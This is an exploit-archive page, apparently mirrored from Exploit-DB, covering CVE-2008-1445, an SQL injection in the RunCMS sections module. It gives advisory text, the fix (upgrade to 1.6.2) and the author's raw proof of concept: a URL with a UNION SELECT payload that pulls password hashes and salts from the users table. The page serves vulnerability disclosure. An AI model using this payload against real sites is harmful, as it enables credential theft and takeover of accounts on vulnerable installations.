header-logo
Suggest Exploit
vendor:
RunCMS
by:
Cr@zy_King
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: RunCMS
Affected Version From: Prior to 1.6.2
Affected Version To: Prior to 1.6.2
Patch Exists: YES
Related CWE: CVE-2008-1445
CPE: a:runcms:runcms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Windows, Mac
2008

RunCMS Module Section (artid) Remote SQL Injection Vulnerability

RunCMS is prone to a remote SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. RunCMS versions prior to 1.6.2 are vulnerable.

Mitigation:

Upgrade to version 1.6.2 or later.
Source

Exploit-DB raw data:

Cr@zy_King

crazy_kinq@hotmail.co.uk / hackshow.us

Grtz : Crackers_Child - str0ke - 3php - Alemin_Krali - Eno7 - DreamTurk - The_Bekir - Mhzr91

Runcms Module Section (artid) Remote Sql Ä°nj. Vuln.

Example :

 - modules/sections/index.php?op=viewarticle&artid=Sql

 - Sql : 1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2

Cr@ Says : Kurtlar Vadisinde Memati Ölmeyecek kimse heyecanlanmasın :D

Alemin_Krali Says : Aynen katılıyorum (ne alaka ise a.q)

Good.

# milw0rm.com [2008-03-20]

Navigation

Suggest Exploit

Services By CQR